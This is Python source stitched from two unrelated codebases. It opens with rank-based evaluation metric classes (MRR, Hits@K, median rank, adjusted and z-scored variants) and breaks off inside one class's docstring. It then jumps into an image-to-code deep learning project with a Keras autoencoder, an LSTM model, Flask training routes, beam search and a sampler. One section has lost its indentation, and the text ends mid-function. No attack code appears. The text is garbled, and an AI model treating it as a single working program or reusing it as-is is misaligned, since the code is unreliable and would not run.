            &= \frac{1}{n} \sum \limits_{i=1}^n \mathbb{E}\left[r_i^{-1}\right] \\
            &= \frac{1}{n} \sum \limits_{i=1}^n \frac{H(N_i)}{N_i}

    For the variance, we have for the individual ranks

    .. math::

        \mathbb{V}\left[r_i^{-1}\right]
            &= \frac{1}{N_i} \sum \limits_{i=1}^{N_i} \left(\frac{H(N_i)}{N_i} - \frac{1}{i}\right)^2 \\
            &= \frac{N_i \cdot H_2(N_i) - H(N_i)^2}{N_i^2}

    and thus overall

    .. math::

        \mathbb{V}\left[\textrm{MRR}\right]
            &= \mathbb{V}\left[\frac{1}{n} \sum \limits_{i=1}^n r_i^{-1}\right] \\
            &= \frac{1}{n^2} \sum \limits_{i=1}^n \mathbb{V}\left[r_i^{-1}\right] \\
            &= \frac{1}{n^2} \sum \limits_{i=1}^n \frac{N_i \cdot H_2(N_i) - H(N_i)^2}{N_i^2} \\

    .. seealso::
        https://en.wikipedia.org/wiki/Inverse_distribution#Inverse_uniform_distribution

    ---
    link: https://en.wikipedia.org/wiki/Mean_reciprocal_rank
    description: The inverse of the harmonic mean over all ranks.
    """

    name = "Mean Reciprocal Rank (MRR)"
    value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
    synonyms: ClassVar[Collection[str]] = ("mean_reciprocal_rank", "mrr")
    increasing = True

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # MRR = mean of 1/rank; cast to float so reciprocal is exact
        # elementwise division rather than integer reciprocal.
        return np.reciprocal(ranks.astype(float)).mean().item()

    def expected_value(
        self,
        num_candidates: np.ndarray,
        num_samples: Optional[int] = None,
        **kwargs,
    ) -> float:  # noqa: D102
        x = np.asanyarray(num_candidates)
        n = x.max().item()
        # Prepend 0 so h[k] == H(k) under 1-based indexing by candidate count.
        h = np.r_[0, generalized_harmonic_numbers(n)]
        # individual ranks' expectation: E[1/r_i] = H(N_i) / N_i
        x = h[num_candidates] / num_candidates
        return x.mean().item()

    def variance(
        self,
        num_candidates: np.ndarray,
        num_samples: Optional[int] = None,
        **kwargs,
    ) -> float:  # noqa:D102
        x = np.asanyarray(num_candidates)
        n = x.max().item()
        # Prepend 0 so vs[k] is the variance for k candidates (1-based lookup).
        vs = np.r_[0, harmonic_variances(n)]
        # individual inverse ranks' variance
        x = vs[x]
        # rank aggregation: (1/n^2) * sum of per-rank variances
        return x.sum().item() / x.size**2
@parse_docdata
class AdjustedInverseHarmonicMeanRank(ReindexedMetric):
    r"""The adjusted MRR index.

    .. note ::
        the actual lower bound is $\frac{-\mathbb{E}[\text{MRR}]}{1-\mathbb{E}[\text{MRR}]}$,
        and thus data dependent.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The re-indexed adjusted MRR
    tight_lower: -E[f]/(1-E[f])
    """

    # Derived metric: base_cls wires the re-indexing machinery of
    # ReindexedMetric to InverseHarmonicMeanRank (MRR).
    name = "Adjusted Inverse Harmonic Mean Rank"
    synonyms: ClassVar[Collection[str]] = ("amrr", "aihmr", "adjusted_mrr", "adjusted_mean_reciprocal_rank")
    value_range = ValueRange(lower=None, lower_inclusive=False, upper=1, upper_inclusive=True)
    base_cls = InverseHarmonicMeanRank
@parse_docdata
class ZInverseHarmonicMeanRank(ZMetric):
    """The z-inverse harmonic mean rank (ZIHMR).

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The z-scored mean reciprocal rank
    """

    # Derived metric: ZMetric applies z-scoring to InverseHarmonicMeanRank.
    name = "z-Mean Reciprocal Rank (ZMRR)"
    synonyms: ClassVar[Collection[str]] = ("zmrr", "zihmr")
    base_cls = InverseHarmonicMeanRank
@parse_docdata
class MedianRank(RankBasedMetric):
    """The median rank.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The median over all ranks.
    """

    # Lower is better (increasing = False); range is [1, inf).
    name = "Median Rank"
    value_range = ValueRange(lower=1, lower_inclusive=True, upper=math.inf)
    increasing = False

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Median of the ranks; num_candidates is ignored here.
        return np.median(ranks).item()
@parse_docdata
class InverseMedianRank(RankBasedMetric):
    """The inverse median rank.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The inverse of the median over all ranks.
    """

    # Higher is better (increasing = True); range is (0, 1].
    name = "Inverse Median Rank"
    value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
    increasing = True

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # 1 / median(ranks); num_candidates is ignored here.
        return np.reciprocal(np.median(ranks)).item()
@parse_docdata
class StandardDeviation(RankBasedMetric):
    """The ranks' standard deviation.

    ---
    link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
    """

    # Dispersion metric over the raw ranks.
    name = "Standard Deviation (std)"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
    increasing = False
    synonyms: ClassVar[Collection[str]] = ("rank_std", "std")

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Population std (numpy default ddof=0) of the ranks.
        return np.asanyarray(ranks).std().item()
@parse_docdata
class Variance(RankBasedMetric):
    """The ranks' variance.

    ---
    link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
    """

    # Dispersion metric over the raw ranks.
    name = "Variance"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
    increasing = False
    synonyms: ClassVar[Collection[str]] = ("rank_var", "var")

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Population variance (numpy default ddof=0) of the ranks.
        return np.asanyarray(ranks).var().item()
@parse_docdata
class MedianAbsoluteDeviation(RankBasedMetric):
    """The ranks' median absolute deviation (MAD).

    ---
    link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html
    """

    name = "Median Absolute Deviation (MAD)"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
    increasing = False
    synonyms: ClassVar[Collection[str]] = ("rank_mad", "mad")

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # scale="normal" rescales the MAD to be a consistent estimator of the
        # standard deviation under normality (cf. scipy.stats docs).
        return stats.median_abs_deviation(ranks, scale="normal").item()
@parse_docdata
class Count(RankBasedMetric):
    """The ranks' count.

    Lower numbers may indicate unreliable results.

    ---
    link: https://pykeen.readthedocs.io/en/stable/reference/evaluation.html
    """

    name = "Count"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=math.inf)
    increasing = False
    synonyms: ClassVar[Collection[str]] = ("rank_count",)

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Number of individual rank observations, as a float for uniformity.
        return float(np.asanyarray(ranks).size)
@parse_docdata
class HitsAtK(RankBasedMetric):
    r"""The Hits @ k.

    For the expected values, we first note that

    .. math::

        \mathbb{I}[r_i \leq k] \sim \textit{Bernoulli}(p_i)

    with $p_i = \min\{\frac{k}{N_i}, 1\}$. Thus, we have

    .. math::

        \mathbb{E}[\mathbb{I}[r_i \leq k]] = p_i

    and

    .. math::

        \mathbb{V}[\mathbb{I}[r_i \leq k]] = p_i \cdot (1 - p_i)

    Hence, we obtain

    .. math::

        \mathbb{E}[Hits@k] &= \mathbb{E}\left[\frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{I}[r_i \leq k]\right] \\
            &= \frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{E}[\mathbb{I}[r_i \leq k]] \\
            &= \frac{1}{n} \sum \limits_{i=1}^{n} p_i

    For the variance, we have

    .. math::

        \mathbb{V}[Hits@k] &= \mathbb{V}\left[\frac{1}{n} \sum \limits_{i=1}^{n} \mathbb{I}[r_i \leq k]\right] \\
            &= \frac{1}{n^2} \sum \limits_{i=1}^{n} \mathbb{V}\left[\mathbb{I}[r_i \leq k]\right] \\
            &= \frac{1}{n^2} \sum \limits_{i=1}^{n} p_i(1 - p_i)

    ---
    description: The relative frequency of ranks not larger than a given k.
    link: https://pykeen.readthedocs.io/en/stable/tutorial/understanding_evaluation.html#hits-k
    """

    name = "Hits @ K"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=1, upper_inclusive=True)
    synonyms: ClassVar[Collection[str]] = ("h@k", "hits@k", "h@", "hits@", "hits_at_", "h_at_")
    increasing = True

    def __init__(self, k: int = 10) -> None:
        # k = the rank cut-off; a rank <= k counts as a "hit".
        super().__init__()
        self.k = k

    def _extra_repr(self) -> Iterable[str]:
        yield f"k={self.k}"

    def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float:  # noqa: D102
        # Fraction of ranks <= k.
        return np.less_equal(ranks, self.k).mean().item()

    @property
    def key(self) -> str:  # noqa: D102
        # Replace the trailing character of the base key with the concrete
        # k value (e.g. a generic "...k" suffix becomes "...10").
        return super().key[:-1] + str(self.k)

    def expected_value(
        self,
        num_candidates: np.ndarray,
        num_samples: Optional[int] = None,
        **kwargs,
    ) -> float:  # noqa: D102
        num_candidates = np.asanyarray(num_candidates, dtype=float)
        # E[Hits@k] = mean of p_i with p_i = min(k / N_i, 1).
        return np.minimum(self.k / num_candidates, 1.0).mean().item()

    def variance(
        self,
        num_candidates: np.ndarray,
        num_samples: Optional[int] = None,
        **kwargs,
    ) -> float:  # noqa:D102
        num_candidates = np.asanyarray(num_candidates, dtype=float)
        p = np.minimum(self.k / num_candidates, 1.0)
        # mean(p * (1-p)) / n equals (1/n^2) * sum(p * (1-p)) from the docstring.
        return (p * (1.0 - p)).mean().item() / num_candidates.size
@parse_docdata
class AdjustedHitsAtK(ReindexedMetric):
    r"""The adjusted Hits at K ($AH_k$).

    .. note ::
        the actual lower bound is $\frac{-\mathbb{E}[H_k]}{1 - \mathbb{E}[H_k]}$, and thus data dependent.

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The re-indexed adjusted hits at K
    tight_lower: -E[f]/(1-E[f])
    """

    # Derived metric: base_cls wires the re-indexing machinery of
    # ReindexedMetric to HitsAtK.
    name = "Adjusted Hits at K"
    synonyms: ClassVar[Collection[str]] = (
        "ahk",
        "ah@k",
        "ahits@k",
        "ah@",
        "ahits@",
        "ahits_at_",
        "ah_at_",
        "adjusted_hits_at_",
    )
    value_range = ValueRange(lower=None, lower_inclusive=False, upper=1, upper_inclusive=True)
    base_cls = HitsAtK
@parse_docdata
class ZHitsAtK(ZMetric):
    """The z-scored hits at k ($ZAH_k$).

    ---
    link: https://arxiv.org/abs/2203.07544
    description: The z-scored hits at K
    """

    # Derived metric: ZMetric applies z-scoring to HitsAtK; only supported
    # for realistic ranks and requires candidate counts.
    name = "z-Hits at K"
    synonyms: ClassVar[Collection[str]] = ("z_hits_at_", "zahk")
    increasing = True
    supported_rank_types = (RANK_REALISTIC,)
    needs_candidates = True
    base_cls = HitsAtK
@parse_docdata
class AdjustedArithmeticMeanRank(ExpectationNormalizedMetric):
    """The adjusted arithmetic mean rank (AMR).

    ---
    description: The mean over all ranks divided by its expected value.
    link: https://arxiv.org/abs/2002.06914
    """

    # Derived metric: ExpectationNormalizedMetric divides ArithmeticMeanRank
    # by its expected value; only supported for realistic ranks and requires
    # candidate counts.
    name = "Adjusted Arithmetic Mean Rank (AAMR)"
    value_range = ValueRange(lower=0, lower_inclusive=True, upper=2, upper_inclusive=False)
    synonyms: ClassVar[Collection[str]] = ("adjusted_mean_rank", "amr", "aamr")
    supported_rank_types = (RANK_REALISTIC,)
    needs_candidates = True
    increasing = False
    base_cls = ArithmeticMeanRank
@parse_docdata
class AdjustedArithmeticMeanRankIndex(ReindexedMetric):
"""The adjusted arithmetic mean rank index (AMRI).
---
link: https://arxiv.org/abs/2002.06914
description: The re-indexed adjusted mean rank | |
CONTEXT_LENGTH]
label = a[j + CONTEXT_LENGTH]
self.ids.append(sample_id)
self.input_images.append(img)
self.partial_sequences.append(context)
self.next_words.append(label)
@staticmethod
def indexify(partial_sequences, voc):
temp = []
for sequence in partial_sequences:
sparse_vectors_sequence = []
for token in sequence:
sparse_vectors_sequence.append(voc.vocabulary[token])
temp.append(np.array(sparse_vectors_sequence))
return temp
@staticmethod
def binarize(partial_sequences, voc):
temp = []
for sequence in partial_sequences:
sparse_vectors_sequence = []
for token in sequence:
sparse_vectors_sequence.append(voc.binary_vocabulary[token])
temp.append(np.array(sparse_vectors_sequence))
return temp
@staticmethod
def sparsify_labels(next_words, voc):
temp = []
for label in next_words:
temp.append(voc.binary_vocabulary[label])
return temp
def save_metadata(self, path):
np.save("{}/meta_dataset".format(path), np.array([self.input_shape, self.output_size, self.size]))
class Generator:
    """Streams (image, partial token sequence) -> next-token training batches."""

    @staticmethod
    def data_generator(voc, gui_paths, img_paths, batch_size, input_shape, generate_binary_sequences=False, verbose=False, loop_only_one=False, images_only=False):
        # One image per GUI file; the two path lists must pair up by index.
        assert len(gui_paths) == len(img_paths)
        voc.create_binary_representation()
        # Infinite loop: Keras-style fit generators are expected to cycle forever.
        while 1:
            batch_input_images = []
            batch_partial_sequences = []
            batch_next_words = []
            sample_in_batch_counter = 0
            for i in range(0, len(gui_paths)):
                # .png files are preprocessed on the fly; anything else is
                # assumed to be a numpy archive exposing a "features" array.
                if img_paths[i].find(".png") != -1:
                    img = Utils.get_preprocessed_img(img_paths[i], IMAGE_SIZE)
                else:
                    img = np.load(img_paths[i])["features"]
                # NOTE(review): `gui` is never closed; a `with` block would be safer.
                gui = open(gui_paths[i], 'r')
                token_sequence = [START_TOKEN]
                for line in gui:
                    # Make "," and newline standalone tokens before splitting.
                    line = line.replace(",", " ,").replace("\n", " \n")
                    tokens = line.split(" ")
                    for token in tokens:
                        voc.append(token)
                        token_sequence.append(token)
                token_sequence.append(END_TOKEN)
                # Left-pad with placeholders so every position has a full
                # context window (named "suffix" but used as a prefix).
                suffix = [PLACEHOLDER] * CONTEXT_LENGTH
                a = np.concatenate([suffix, token_sequence])
                # Sliding window: CONTEXT_LENGTH tokens of context -> next token.
                for j in range(0, len(a) - CONTEXT_LENGTH):
                    context = a[j:j + CONTEXT_LENGTH]
                    label = a[j + CONTEXT_LENGTH]
                    batch_input_images.append(img)
                    batch_partial_sequences.append(context)
                    batch_next_words.append(label)
                    sample_in_batch_counter += 1
                    # Flush the batch when full (or at the last file in
                    # loop_only_one mode, possibly short).
                    if sample_in_batch_counter == batch_size or (loop_only_one and i == len(gui_paths) - 1):
                        if verbose:
                            print("Generating sparse vectors...")
                        batch_next_words = Dataset.sparsify_labels(batch_next_words, voc)
                        if generate_binary_sequences:
                            batch_partial_sequences = Dataset.binarize(batch_partial_sequences, voc)
                        else:
                            batch_partial_sequences = Dataset.indexify(batch_partial_sequences, voc)
                        if verbose:
                            print("Convert arrays...")
                        batch_input_images = np.array(batch_input_images)
                        batch_partial_sequences = np.array(batch_partial_sequences)
                        batch_next_words = np.array(batch_next_words)
                        if verbose:
                            print("Yield batch")
                        #include a generator for images only for autoencoder
                        if images_only:
                            yield(batch_input_images, batch_input_images)
                        else:
                            yield ([batch_input_images, batch_partial_sequences], batch_next_words)
                        # Reset accumulators for the next batch.
                        batch_input_images = []
                        batch_partial_sequences = []
                        batch_next_words = []
                        sample_in_batch_counter = 0
class autoencoder_image(AModel):
    """Convolutional autoencoder over GUI screenshots.

    Encoder: three Conv/Conv/MaxPool/Dropout stages (32 -> 64 -> 128
    filters); the bottleneck dropout layer is named 'encoded_layer' so the
    encoder half can be recovered later. Decoder mirrors it with
    Conv2DTranspose/UpSampling stages back to 3 channels.
    """
    def __init__(self, input_shape, output_size, output_path):
        AModel.__init__(self, input_shape, output_size, output_path)
        self.name = 'autoencoder'
        input_image = Input(shape=input_shape)
        encoder = Conv2D(32, 3, padding='same', activation='relu')(input_image)
        encoder = Conv2D(32, 3, padding='same', activation='relu')(encoder)
        encoder = MaxPooling2D()(encoder)
        encoder = Dropout(0.25)(encoder)
        encoder = Conv2D(64, 3, padding='same', activation='relu')(encoder)
        encoder = Conv2D(64, 3, padding='same', activation='relu')(encoder)
        encoder = MaxPooling2D()(encoder)
        encoder = Dropout(0.25)(encoder)
        encoder = Conv2D(128, 3, padding='same', activation='relu')(encoder)
        encoder = Conv2D(128, 3, padding='same', activation='relu')(encoder)
        encoder = MaxPooling2D()(encoder)
        # Named so image_to_code / predict_hidden can cut the model here.
        encoded = Dropout(0.25, name='encoded_layer')(encoder)
        decoder = Conv2DTranspose(128, 3, padding='same', activation='relu')(encoded)
        decoder = Conv2DTranspose(128, 3, padding='same', activation='relu')(decoder)
        decoder = UpSampling2D()(decoder)
        decoder = Dropout(0.25)(decoder)
        decoder = Conv2DTranspose(64, 3, padding='same', activation='relu')(decoder)
        decoder = Conv2DTranspose(64, 3, padding='same', activation='relu')(decoder)
        decoder = UpSampling2D()(decoder)
        decoder = Dropout(0.25)(decoder)
        decoder = Conv2DTranspose(32, 3, padding='same', activation='relu')(decoder)
        decoder = Conv2DTranspose(3, 3, padding='same', activation='relu')(decoder)
        decoder = UpSampling2D()(decoder)
        decoded = Dropout(0.25)(decoder)
        self.model = Model(input_image, decoded)
        self.model.compile(optimizer='adadelta', loss='binary_crossentropy')
        self.model.summary()
    def fit_generator(self, generator, steps_per_epoch):
        """Train from a (images, images) generator, then persist weights."""
        self.model.fit_generator(generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, verbose=1)
        self.save()
    def predict_hidden(self, images):
        """Return the bottleneck ('encoded_layer') activations for images.

        Bug fix: the encoder sub-model must be built from the underlying
        Keras model (self.model) — the AModel wrapper itself has no
        .input / .get_layer, so the original raised AttributeError.
        """
        hidden_layer_model = Model(inputs=self.model.input,
                                   outputs=self.model.get_layer('encoded_layer').output)
        return hidden_layer_model.predict(images)
class image_to_code(AModel):
    """Image-to-DSL model: frozen pretrained encoder + LSTM language model.

    The visual branch reuses the autoencoder's encoder (up to
    'encoded_layer', weights frozen); the textual branch is a 2-layer LSTM
    over the CONTEXT_LENGTH one-hot token window. Both are concatenated and
    decoded by two more LSTMs into a softmax over the vocabulary.
    """
    def __init__(self, input_shape, output_size, output_path):
        AModel.__init__(self, input_shape, output_size, output_path)
        self.name = "image_to_code"
        visual_input = Input(shape=input_shape)
        # Load the pre-trained autoencoder model
        # NOTE(review): weight path is hard-coded to 'static/model/...' while
        # output_path is also passed in — confirm they always agree.
        autoencoder_model = autoencoder_image(input_shape, input_shape, output_path)
        autoencoder_model.load('autoencoder')
        autoencoder_model.model.load_weights('static/model/autoencoder.h5')
        # Get only the model up to the encoded part
        hidden_layer_model_freeze = Model(inputs=autoencoder_model.model.input,
                                          outputs=autoencoder_model.model.get_layer('encoded_layer').output)
        hidden_layer_input = hidden_layer_model_freeze(visual_input)
        # Additional layers before concatenation
        hidden_layer_model = Flatten()(hidden_layer_input)
        hidden_layer_model = Dense(1024, activation='relu')(hidden_layer_model)
        hidden_layer_model = Dropout(0.3)(hidden_layer_model)
        hidden_layer_model = Dense(1024, activation='relu')(hidden_layer_model)
        hidden_layer_model = Dropout(0.3)(hidden_layer_model)
        # Repeat the image embedding once per context position so it can be
        # concatenated with the per-timestep LSTM outputs below.
        hidden_layer_result = RepeatVector(CONTEXT_LENGTH)(hidden_layer_model)
        # Make sure the loaded hidden_layer_model_freeze will no longer be updated
        for layer in hidden_layer_model_freeze.layers:
            layer.trainable = False
        language_model = Sequential()
        language_model.add(LSTM(128, return_sequences=True, input_shape=(CONTEXT_LENGTH, output_size)))
        language_model.add(LSTM(128, return_sequences=True))
        textual_input = Input(shape=(CONTEXT_LENGTH, output_size))
        encoded_text = language_model(textual_input)
        decoder = concatenate([hidden_layer_result, encoded_text])
        decoder = LSTM(512, return_sequences=True)(decoder)
        # Last decoder LSTM collapses the sequence: one softmax per sample.
        decoder = LSTM(512, return_sequences=False)(decoder)
        decoder = Dense(output_size, activation='softmax')(decoder)
        self.model = Model(inputs=[visual_input, textual_input], outputs=decoder)
        optimizer = RMSprop(lr=0.0001, clipvalue=1.0)
        self.model.compile(loss='categorical_crossentropy', optimizer=optimizer)
    def fit_generator(self, generator, steps_per_epoch):
        """Train from the ([images, contexts], next_words) generator and save."""
        self.model.summary()
        self.model.fit_generator(generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, verbose=1)
        self.save()
    def predict(self, image, partial_caption):
        """Return the next-token probability vector for a single sample."""
        return self.model.predict([image, partial_caption], verbose=0)[0]
    def predict_batch(self, images, partial_captions):
        """Return next-token probability vectors for a batch of samples."""
        return self.model.predict([images, partial_captions], verbose=1)
def run(input_path, output_path, train_autoencoder=False):
    """Train the image-to-code pipeline.

    Loads the dataset, persists its metadata/vocabulary to output_path,
    optionally (re)trains the image autoencoder, then trains the
    image_to_code model.

    Args:
        input_path: dataset directory with .gui files and image features.
        output_path: directory for model weights, metadata and vocabulary.
        train_autoencoder: when True, fit the autoencoder first.
    """
    np.random.seed(1234)
    dataset = Dataset()
    dataset.load(input_path, generate_binary_sequences=True)
    dataset.save_metadata(output_path)
    dataset.voc.save(output_path)
    gui_paths, img_paths = Dataset.load_paths_only(input_path)
    input_shape = dataset.input_shape
    output_size = dataset.output_size
    # Fix: Keras expects an integer number of steps; '/' yields a float
    # under Python 3 and breaks fit_generator on recent versions.
    steps_per_epoch = dataset.size // BATCH_SIZE
    voc = Vocabulary()
    voc.retrieve(output_path)
    generator = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE, input_shape=input_shape,
                                         generate_binary_sequences=True)
    # Included a generator for images only as an input for autoencoders
    generator_images = Generator.data_generator(voc, gui_paths, img_paths, batch_size=BATCH_SIZE,
                                                input_shape=input_shape, generate_binary_sequences=True,
                                                images_only=True)
    if train_autoencoder:
        autoencoder_model = autoencoder_image(input_shape, input_shape, output_path)
        autoencoder_model.fit_generator(generator_images, steps_per_epoch=steps_per_epoch)
        # Drop the autoencoder's graph/session before building the main model.
        clear_session()
    model = image_to_code(input_shape, output_size, output_path)
    model.fit_generator(generator, steps_per_epoch=steps_per_epoch)
@app.route("/Train")
def train():
    """Render the training landing page (GET /Train)."""
    return render_template('Train.html')
@app.route("/TrainProcess", methods=["POST"])
def train_process():
    """Run model training synchronously (POST /TrainProcess).

    Uses hard-coded dataset/model paths; the request blocks until the
    whole training run finishes, then renders a status page.
    """
    print("train_process Called")
    input_path = "static/datasets/web/all_data/training_features"
    output_path = "static/model"
    # Autoencoder pre-training is skipped here; only the image_to_code
    # model is (re)trained from previously saved autoencoder weights.
    train_autoencoder = False
    run(input_path, output_path, train_autoencoder=train_autoencoder)
    return render_template('TrainProcess.html')
class Node:
    """A node in the beam-search tree.

    Attributes:
        key: token id (or "root").
        value: cumulative path probability (product of parent values).
        data: arbitrary payload (here: the probability vector).
        parent / root / children / level: tree bookkeeping.
    """
    def __init__(self, key, value, data=None):
        self.key = key
        self.value = value
        self.data = data
        self.parent = None
        self.root = None
        self.children = []
        self.level = 0
    def add_children(self, children, beam_width):
        """Score candidates against this path and adopt the best beam_width.

        Each candidate's value becomes its own score times this node's
        cumulative value; candidates are then sorted descending and only
        the top beam_width are attached.
        """
        for child in children:
            child.level = self.level + 1
            child.value = child.value * self.value
        nodes = sorted(children, key=lambda node: node.value, reverse=True)
        nodes = nodes[:beam_width]
        # Resolve this node's root once, then propagate it to every adopted
        # child. (Bug fix: the original assigned it through the stale loop
        # variable `child`, so only the last candidate — possibly a pruned
        # one — got a root, and adopted children kept root=None.)
        if self.parent is None:
            self.root = self
        else:
            self.root = self.parent.root
        for node in nodes:
            self.children.append(node)
            node.parent = self
            node.root = self.root
    def remove_child(self, child):
        """Detach a direct child from this node."""
        self.children.remove(child)
    def max_child(self):
        """Return the highest-value leaf in this subtree (self if a leaf)."""
        if len(self.children) == 0:
            return self
        max_childs = []
        for child in self.children:
            max_childs.append(child.max_child())
        nodes = sorted(max_childs, key=lambda child: child.value, reverse=True)
        return nodes[0]
    def show(self, depth=0):
        """Print the subtree, indented by depth (debug helper)."""
        print(" " * depth, self.key, self.value, self.level)
        for child in self.children:
            child.show(depth + 2)
class BeamSearch:
    """Beam search over a Node tree.

    The caller grows the tree via add_nodes(), periodically calls
    prune_leaves() to keep only beam_width frontier paths, and finally
    calls search() to extract the best path.
    """
    def __init__(self, beam_width=1):
        # Number of frontier paths kept alive after each pruning pass.
        self.beam_width = beam_width
        self.root = None
        self.clear()
    def search(self):
        """Return (keys, data) of the best path and reset the tree."""
        result = self.root.max_child()
        self.clear()
        return self.retrieve_path(result)
    def add_nodes(self, parent, children):
        """Attach candidate children to parent, keeping the top beam_width."""
        parent.add_children(children, self.beam_width)
    def is_valid(self):
        """True when every leaf sits at the same depth (frontier is level)."""
        leaves = self.get_leaves()
        level = leaves[0].level
        counter = 0
        for leaf in leaves:
            if leaf.level == level:
                counter += 1
            else:
                break
        if counter == len(leaves):
            return True
        return False
    def get_leaves(self):
        """Collect all current leaf nodes of the tree."""
        leaves = []
        self.search_leaves(self.root, leaves)
        return leaves
    def search_leaves(self, node, leaves):
        """Depth-first helper appending leaves under node into `leaves`."""
        for child in node.children:
            if len(child.children) == 0:
                leaves.append(child)
            else:
                self.search_leaves(child, leaves)
    def prune_leaves(self):
        """Keep only the beam_width best leaves, then re-level the frontier.

        First drops every leaf outside the top beam_width by value; the
        while-loop then repeatedly removes leaves shallower than the
        deepest remaining level until all leaves share one depth.
        """
        leaves = self.get_leaves()
        nodes = sorted(leaves, key=lambda leaf: leaf.value, reverse=True)
        nodes = nodes[self.beam_width:]
        for node in nodes:
            node.parent.remove_child(node)
        while not self.is_valid():
            leaves = self.get_leaves()
            max_level = 0
            for leaf in leaves:
                if leaf.level > max_level:
                    max_level = leaf.level
            for leaf in leaves:
                if leaf.level < max_level:
                    leaf.parent.remove_child(leaf)
    def clear(self):
        """Reset the tree to a fresh root with probability 1."""
        self.root = None
        self.root = Node("root", 1.0, None)
    def retrieve_path(self, end):
        """Walk parents from `end` to the root and return the forward path.

        Returns (keys, data) excluding the artificial root node.
        """
        path = [end.key]
        data = [end.data]
        while end.parent is not None:
            end = end.parent
            path.append(end.key)
            data.append(end.data)
        result_path = []
        result_data = []
        # Reverse, skipping index len-1 (the root placeholder).
        for i in range(len(path) - 2, -1, -1):
            result_path.append(path[i])
            result_data.append(data[i])
        return result_path, result_data
class Sampler:
    """Decodes DSL token sequences from a trained image_to_code model."""
    def __init__(self, voc_path, input_shape, output_size, context_length):
        # Vocabulary is restored from the files saved during training.
        self.voc = Vocabulary()
        self.voc.retrieve(voc_path)
        self.input_shape = input_shape
        self.output_size = output_size
        print("Vocabulary size: {}".format(self.voc.size))
        print("Input shape: {}".format(self.input_shape))
        print("Output size: {}".format(self.output_size))
        self.context_length = context_length
    def predict_greedy(self, model, input_img, require_sparse_label=True, sequence_length=150, verbose=False):
        """Decode greedily: always take the argmax token at each step.

        Returns (predictions, out_probas): the concatenated token string
        (starting with START_TOKEN) and the per-step probability vectors.
        Stops at END_TOKEN or after sequence_length steps.
        """
        # Seed the context with placeholders followed by the start token.
        current_context = [self.voc.vocabulary[PLACEHOLDER]] * (self.context_length - 1)
        current_context.append(self.voc.vocabulary[START_TOKEN])
        if require_sparse_label:
            current_context = Utils.sparsify(current_context, self.output_size)
        predictions = START_TOKEN
        out_probas = []
        for i in range(0, sequence_length):
            if verbose:
                print("predicting {}/{}...".format(i, sequence_length))
            probas = model.predict(input_img, np.array([current_context]))
            prediction = np.argmax(probas)
            out_probas.append(probas)
            # Slide the context window left by one and append the new token.
            new_context = []
            for j in range(1, self.context_length):
                new_context.append(current_context[j])
            if require_sparse_label:
                sparse_label = np.zeros(self.output_size)
                sparse_label[prediction] = 1
                new_context.append(sparse_label)
            else:
                new_context.append(prediction)
            current_context = new_context
            predictions += self.voc.token_lookup[prediction]
            if self.voc.token_lookup[prediction] == END_TOKEN:
                break
        return predictions, out_probas
    def recursive_beam_search(self, model, input_img, current_context, beam, current_node, sequence_length):
        """Expand one beam-search level from current_node and recurse.

        Every vocabulary entry becomes a candidate child (the beam keeps
        only the best); recursion stops at END_TOKEN on the best path or
        when sequence_length reaches 1.
        """
        probas = model.predict(input_img, np.array([current_context]))
        predictions = []
        for i in range(0, len(probas)):
            predictions.append((i, probas[i], probas))
        nodes = []
        for i in range(0, len(predictions)):
            prediction = predictions[i][0]
            score = predictions[i][1]
            output_probas = predictions[i][2]
            nodes.append(Node(prediction, score, output_probas))
        beam.add_nodes(current_node, nodes)
        # Only prune once the frontier is level, so siblings compete fairly.
        if beam.is_valid():
            beam.prune_leaves()
            if sequence_length == 1 or self.voc.token_lookup[beam.root.max_child().key] == END_TOKEN:
                return
            for node in beam.get_leaves():
                prediction = node.key
                # Shift the context window and one-hot encode the new token.
                new_context = []
                for j in range(1, self.context_length):
                    new_context.append(current_context[j])
                sparse_label = np.zeros(self.output_size)
                sparse_label[prediction] = 1
                new_context.append(sparse_label)
                self.recursive_beam_search(model, input_img, new_context, beam, node, sequence_length - 1)
    def predict_beam_search(self, model, input_img, beam_width=3, require_sparse_label=True, sequence_length=150):
        """Decode with beam search; returns (predictions, out_probas).

        Same contract as predict_greedy but explores beam_width paths.
        """
        predictions = START_TOKEN
        out_probas = []
        current_context = [self.voc.vocabulary[PLACEHOLDER]] * (self.context_length - 1)
        current_context.append(self.voc.vocabulary[START_TOKEN])
        if require_sparse_label:
            current_context = Utils.sparsify(current_context, self.output_size)
        beam = BeamSearch(beam_width=beam_width)
        self.recursive_beam_search(model, input_img, current_context, beam, beam.root, sequence_length)
        predicted_sequence, probas_sequence = beam.search()
        for k in range(0, len(predicted_sequence)):
            prediction = predicted_sequence[k]
